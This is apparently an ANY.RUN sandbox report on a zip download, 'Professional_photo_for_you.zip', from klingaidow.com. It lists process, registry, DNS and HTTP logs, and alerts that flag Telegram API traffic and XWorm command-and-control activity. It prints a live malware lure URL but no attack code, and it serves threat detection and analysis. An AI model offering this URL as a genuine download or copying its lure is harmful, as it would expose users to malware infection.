c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2972"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://klingaidow.com/Professional_photo_for_you.zip"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3188"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6104 --field-trial-handle=2220,i,15410932170991593848,7011793361797548853,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
9 944
Read events
9 861
Write events
67
Delete events
16

Modification events

(PID) Process:(2972) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(2972) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(2972) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(2972) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
(PID) Process:(2972) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:writeName:S-1-5-21-1693682860-607145093-2874071422-1001
Value:
B0F9230D36862F00
(PID) Process:(2972) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:MicrosoftEdgeAutoLaunch_29EBC4579851B72EE312C449CF839B1A
Value:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
(PID) Process:(2972) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\EdgeUpdate\Clients\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\Commands\on-logon-autolaunch
Operation:writeName:Enabled
Value:
0
(PID) Process:(2972) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\Profiles
Operation:writeName:EnhancedLinkOpeningDefault
Value:
Default
(PID) Process:(2972) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\262822
Operation:writeName:WindowTabManagerFileMappingId
Value:
{4FB6A405-6CFD-4FCE-8788-C0F2D6F84A7F}
(PID) Process:(7712) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:writeName:{2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF
Value:
01000000000000005676E3911C3EDB01
Executable files
222
Suspicious files
1 264
Text files
1 479
Unknown types
9

Dropped files

PID
Process
Filename
Type
2972msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF1355b5.TMP
MD5:
SHA256:
2972msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
2972msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF1355c4.TMP
MD5:
SHA256:
2972msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
2972msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF1355c4.TMP
MD5:
SHA256:
2972msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
2972msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF1355c4.TMP
MD5:
SHA256:
2972msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
2972msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF1355d4.TMP
MD5:
SHA256:
2972msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
51
TCP/UDP connections
68
DNS requests
72
Threats
36

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7912
SIHClient.exe
GET
200
173.223.117.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6872
svchost.exe
GET
206
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/be1098f2-af7c-46fa-9fb6-e1f0043ecb69?P1=1732620636&P2=404&P3=2&P4=ZfPFAb5NYQATWJTn9y4ITNFs7lMgLggkduqOgBk4QNkLGDAXlAxkApKQuQfRZIMVoOcXJkU2pmYkQnpiz662WQ%3d%3d
unknown
whitelisted
5028
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
6872
svchost.exe
GET
206
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/be1098f2-af7c-46fa-9fb6-e1f0043ecb69?P1=1732620636&P2=404&P3=2&P4=ZfPFAb5NYQATWJTn9y4ITNFs7lMgLggkduqOgBk4QNkLGDAXlAxkApKQuQfRZIMVoOcXJkU2pmYkQnpiz662WQ%3d%3d
unknown
whitelisted
6872
svchost.exe
GET
206
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/be1098f2-af7c-46fa-9fb6-e1f0043ecb69?P1=1732620636&P2=404&P3=2&P4=ZfPFAb5NYQATWJTn9y4ITNFs7lMgLggkduqOgBk4QNkLGDAXlAxkApKQuQfRZIMVoOcXJkU2pmYkQnpiz662WQ%3d%3d
unknown
whitelisted
6872
svchost.exe
GET
206
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/be1098f2-af7c-46fa-9fb6-e1f0043ecb69?P1=1732620636&P2=404&P3=2&P4=ZfPFAb5NYQATWJTn9y4ITNFs7lMgLggkduqOgBk4QNkLGDAXlAxkApKQuQfRZIMVoOcXJkU2pmYkQnpiz662WQ%3d%3d
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6872
svchost.exe
GET
206
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/be1098f2-af7c-46fa-9fb6-e1f0043ecb69?P1=1732620636&P2=404&P3=2&P4=ZfPFAb5NYQATWJTn9y4ITNFs7lMgLggkduqOgBk4QNkLGDAXlAxkApKQuQfRZIMVoOcXJkU2pmYkQnpiz662WQ%3d%3d
unknown
whitelisted
6872
svchost.exe
GET
206
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/be1098f2-af7c-46fa-9fb6-e1f0043ecb69?P1=1732620636&P2=404&P3=2&P4=ZfPFAb5NYQATWJTn9y4ITNFs7lMgLggkduqOgBk4QNkLGDAXlAxkApKQuQfRZIMVoOcXJkU2pmYkQnpiz662WQ%3d%3d
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
2.23.209.187:443
www.bing.com
Akamai International B.V.
GB
whitelisted
5064
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
13.107.42.16:443
config.edge.skype.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
239.255.255.250:1900
whitelisted
13.107.21.239:443
edge.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.104.136.2
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
  • 2.20.245.138
  • 2.20.245.137
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 173.223.117.131
whitelisted
google.com
  • 142.250.186.142
whitelisted
www.bing.com
  • 2.23.209.187
  • 2.23.209.130
  • 2.23.209.133
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
config.edge.skype.com
  • 13.107.42.16
whitelisted
edge.microsoft.com
  • 13.107.21.239
  • 204.79.197.239
whitelisted
edge-mobile-static.azureedge.net
  • 13.107.246.45
whitelisted
klingaidow.com
  • 202.92.4.57
unknown

Threats

PID
Process
Class
Message
2192
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
5604
InstallUtil.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
5604
InstallUtil.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
5604
InstallUtil.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm TCP Packet
32 ETPRO signatures available at the full report
Process
Message
mp4.exe
qt.qpa.plugin: Could not find the Qt platform plugin "windows" in ""
mp4.exe
This application failed to start because no Qt platform plugin could be initialized. Reinstalling the application may fix this problem.
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
https://klingaidow.com/Professional_photo_for_you.zip